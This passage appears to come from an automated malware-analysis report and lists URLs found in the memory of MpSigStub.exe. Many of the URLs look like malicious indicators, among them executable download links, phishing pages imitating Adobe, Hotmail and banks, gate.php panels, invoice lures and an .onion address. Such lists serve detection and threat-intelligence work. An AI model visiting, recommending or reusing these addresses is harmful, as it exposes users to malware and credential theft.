Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interFace/ActiveSeed.aspx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interface/SeedInstall.aspx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data.dat
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data/data
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/lists/200
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://aa.llsging.com/ww/new05.htm?075width=1name=
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://abidjanlit.com/loyiruef/invoice/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://abitando.net/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://accordlifespec.com/gtt.exe
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://acglgoa.com/faq.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://agnoted.com/gen/z/virupload.html)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net.info/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net/chrome.xml
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://americanexpress-secure.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://amiral.ga/wp-content/cUFTze5/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://ankarahurdacim.com/wp-admin/3yk1/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://aspeja.org/question/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://avisocliente31.altervista.org/hotmail-atualizacao32
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/final3.php
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/video/prenium.xpi
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/watch/prenium.crx
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18294785233.00000138AA777000.00000004.00000001.sdmp	String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
